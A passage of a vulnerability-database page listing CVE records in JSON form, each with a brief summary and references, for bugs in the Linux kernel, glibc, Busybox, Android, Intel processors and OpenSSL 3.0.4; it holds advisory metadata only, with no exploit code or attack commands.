"[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/202208-23" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "secure@intel.com", "ID": "CVE-2022-21123", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Intel(R) Processors", "version": { "version_data": [ { "version_value": "See references" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Incomplete cleanup of multi-core shared buffers for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": " information disclosure " } ] } ] }, "references": { "reference_data": [ { "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html", "refsource": "MISC", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "name": "https://security.netapp.com/advisory/ntap-20220624-0008/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/202208-23" } ] } } } }, "cveMetadata": { "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "assignerShortName": "intel", "cveId": "CVE-2022-21123", "datePublished": "2022-06-15T19:59:35", "dateReserved": "2021-11-12T00:00:00", "dateUpdated": "2024-08-03T02:31:59.023Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3104
Vulnerability from cvelistv5
Published
2022-12-14 00:00
Modified
2024-08-03 01:00
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 5.16-rc6. lkdtm_ARRAY_BOUNDS in drivers/misc/lkdtm/bugs.c lacks check of the return value of kmalloc() and will cause the null pointer dereference.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:00:09.942Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=v5.19-rc2\u0026id=4a9800c81d2f34afb66b4b42e0330ae8298019a2" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153062" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux 5.16-rc6" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 5.16-rc6. lkdtm_ARRAY_BOUNDS in drivers/misc/lkdtm/bugs.c lacks check of the return value of kmalloc() and will cause the null pointer dereference." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-14T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=v5.19-rc2\u0026id=4a9800c81d2f34afb66b4b42e0330ae8298019a2" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153062" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-3104", "datePublished": "2022-12-14T00:00:00", "dateReserved": "2022-09-02T00:00:00", "dateUpdated": "2024-08-03T01:00:09.942Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38604
Vulnerability from cvelistv5
Published
2021-08-12 15:43
Modified
2024-08-04 01:44
Severity ?
EPSS score ?
Summary
In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix.
References
▼ | URL | Tags |
---|---|---|
https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=b805aebd42364fe696e417808a700fdb9800c9e8 | x_refsource_MISC | |
https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=4cc79c217744743077bf7a0ec5e0a4318f1e6641 | x_refsource_MISC | |
https://sourceware.org/bugzilla/show_bug.cgi?id=28213 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYEXYM37RCJWJ6B5KQUYQI4NZBDDYSXP/ | vendor-advisory, x_refsource_FEDORA | |
https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC | |
https://blog.tuxcare.com/cve/tuxcare-team-identifies-cve-2021-38604-a-new-vulnerability-in-glibc | x_refsource_MISC | |
https://security.netapp.com/advisory/ntap-20210909-0005/ | x_refsource_CONFIRM | |
https://security.gentoo.org/glsa/202208-24 | vendor-advisory, x_refsource_GENTOO |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:44:23.621Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=b805aebd42364fe696e417808a700fdb9800c9e8" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=4cc79c217744743077bf7a0ec5e0a4318f1e6641" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28213" }, { "name": "FEDORA-2021-16dc1f33af", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYEXYM37RCJWJ6B5KQUYQI4NZBDDYSXP/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://blog.tuxcare.com/cve/tuxcare-team-identifies-cve-2021-38604-a-new-vulnerability-in-glibc" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210909-0005/" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-24" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-08-14T15:07:13", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=b805aebd42364fe696e417808a700fdb9800c9e8" }, { "tags": [ "x_refsource_MISC" ], "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=4cc79c217744743077bf7a0ec5e0a4318f1e6641" }, { "tags": [ "x_refsource_MISC" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28213" }, { "name": "FEDORA-2021-16dc1f33af", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYEXYM37RCJWJ6B5KQUYQI4NZBDDYSXP/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "tags": [ "x_refsource_MISC" ], "url": "https://blog.tuxcare.com/cve/tuxcare-team-identifies-cve-2021-38604-a-new-vulnerability-in-glibc" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20210909-0005/" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/202208-24" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-38604", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://sourceware.org/git/?p=glibc.git;a=commit;h=b805aebd42364fe696e417808a700fdb9800c9e8", "refsource": "MISC", "url": "https://sourceware.org/git/?p=glibc.git;a=commit;h=b805aebd42364fe696e417808a700fdb9800c9e8" }, { "name": "https://sourceware.org/git/?p=glibc.git;a=commit;h=4cc79c217744743077bf7a0ec5e0a4318f1e6641", "refsource": "MISC", "url": "https://sourceware.org/git/?p=glibc.git;a=commit;h=4cc79c217744743077bf7a0ec5e0a4318f1e6641" }, { "name": "https://sourceware.org/bugzilla/show_bug.cgi?id=28213", "refsource": "MISC", "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28213" }, { "name": "FEDORA-2021-16dc1f33af", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GYEXYM37RCJWJ6B5KQUYQI4NZBDDYSXP/" }, { "name": "https://www.oracle.com/security-alerts/cpujul2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "name": "https://blog.tuxcare.com/cve/tuxcare-team-identifies-cve-2021-38604-a-new-vulnerability-in-glibc", "refsource": "MISC", "url": "https://blog.tuxcare.com/cve/tuxcare-team-identifies-cve-2021-38604-a-new-vulnerability-in-glibc" }, { "name": "https://security.netapp.com/advisory/ntap-20210909-0005/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20210909-0005/" }, { "name": "GLSA-202208-24", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/202208-24" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-38604", "datePublished": "2021-08-12T15:43:34", "dateReserved": "2021-08-12T00:00:00", "dateUpdated": "2024-08-04T01:44:23.621Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42375
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
An incorrect handling of a special element in Busybox's ash applet leads to denial of service when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This may be used for DoS under rare conditions of filtered command input.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.275Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "An incorrect handling of a special element in Busybox\u0027s ash applet leads to denial of service when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This may be used for DoS under rare conditions of filtered command input." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-159", "description": "CWE-159", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42375", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.275Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3565
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function del_timer of the file drivers/isdn/mISDN/l1oip_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211088.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.837Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=2568a7e0832ee30b0a351016d03062ab4e0e0a3f" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211088" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function del_timer of the file drivers/isdn/mISDN/l1oip_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211088." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 4.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=2568a7e0832ee30b0a351016d03062ab4e0e0a3f" }, { "url": "https://vuldb.com/?id.211088" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel Bluetooth l1oip_core.c del_timer use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3565", "datePublished": "2022-10-17T00:00:00", "dateReserved": "2022-10-17T00:00:00", "dateUpdated": "2024-08-03T01:14:02.837Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-41849
Vulnerability from cvelistv5
Published
2022-09-30 00:00
Modified
2024-08-03 12:56
Severity ?
EPSS score ?
Summary
drivers/video/fbdev/smscufx.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free if a physically proximate attacker removes a USB device while calling open(), aka a race condition between ufx_ops_open and ufx_usb_disconnect.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:56:38.191Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20220925133243.GA383897%40ubuntu/T/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5610bcfe8693c02e2e4c8b31427f1bdbdecc839c" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "drivers/video/fbdev/smscufx.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free if a physically proximate attacker removes a USB device while calling open(), aka a race condition between ufx_ops_open and ufx_usb_disconnect." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:40:34.370971", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/all/20220925133243.GA383897%40ubuntu/T/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5610bcfe8693c02e2e4c8b31427f1bdbdecc839c" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-41849", "datePublished": "2022-09-30T00:00:00", "dateReserved": "2022-09-30T00:00:00", "dateUpdated": "2024-08-03T12:56:38.191Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1073
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
A memory corruption flaw was found in the Linux kernel’s human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.333Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173403" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/id=b12fece4c64857e5fab4290bf01b2e0317a88456" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/osssecurity/2023/01/17/3" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: type confusions on hid report_list entry", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/2" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: NULL pointer dereference in hid_betopff_play()", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/3" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "A memory corruption flaw was found in the Linux kernel\u2019s human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-05T21:06:16.478573", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173403" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/id=b12fece4c64857e5fab4290bf01b2e0317a88456" }, { "url": "https://www.openwall.com/lists/osssecurity/2023/01/17/3" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: type confusions on hid report_list entry", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/2" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: NULL pointer dereference in hid_betopff_play()", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/3" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1073", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-02-27T00:00:00", "dateUpdated": "2024-08-02T05:32:46.333Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-20572
Vulnerability from cvelistv5
Published
2022-12-16 00:00
Modified
2024-08-03 02:17
Severity ?
EPSS score ?
Summary
In verity_target of dm-verity-target.c, there is a possible way to modify read-only files due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-234475629References: Upstream kernel
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:17:52.907Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://source.android.com/security/bulletin/pixel/2022-12-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Android", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Android kernel" } ] } ], "descriptions": [ { "lang": "en", "value": "In verity_target of dm-verity-target.c, there is a possible way to modify read-only files due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-234475629References: Upstream kernel" } ], "problemTypes": [ { "descriptions": [ { "description": "Elevation of privilege", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-16T00:00:00", "orgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "shortName": "google_android" }, "references": [ { "url": "https://source.android.com/security/bulletin/pixel/2022-12-01" } ] } }, "cveMetadata": { "assignerOrgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "assignerShortName": "google_android", "cveId": "CVE-2022-20572", "datePublished": "2022-12-16T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-03T02:17:52.907Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2274
Vulnerability from cvelistv5
Published
2022-07-01 07:30
Modified
2024-09-17 00:20
Severity ?
EPSS score ?
Summary
The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue.
References
▼ | URL | Tags |
---|---|---|
https://github.com/openssl/openssl/issues/18625 | x_refsource_CONFIRM | |
https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=4d8a88c134df634ba610ff8db1eb8478ac5fd345 | x_refsource_CONFIRM | |
https://www.openssl.org/news/secadv/20220705.txt | x_refsource_CONFIRM | |
